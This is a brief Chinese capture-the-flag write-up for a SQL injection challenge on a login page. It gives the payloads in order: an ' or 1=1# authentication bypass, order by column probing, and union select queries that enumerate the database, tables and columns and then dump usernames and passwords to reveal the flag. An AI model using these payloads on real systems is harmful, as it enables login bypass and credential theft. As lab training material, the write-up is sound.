进入环境
一个登录页面,直接先尝试万能密码登录
' or 1=1#
密码随便输
给了一大串密码,可能是flag,试着提交发现不是,有点像md5解密出来也不是,那就正常注入
先爆字段
admin' order by 3# //正常回显
admin' order by 4# //报错
密码:9977f6106e97c852fe19bab37f817cd6
看回显地方
' union select 1,2,3#
密码都是随便输,注释了
先爆数据库 :geek
' union select 1,2,database()#
爆数据表:geekuser,l0ve1ysq1
' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#
爆字段:id,username,password
' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#
可能不是这个表,查另一个
' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
都是一样的,那都查查看 ,直接出
' union select 1,2,group_concat(id,username,password) from geek.l0ve1ysq1#
flag{68cd9931-6487-4c3a-8377-55322f3eca01}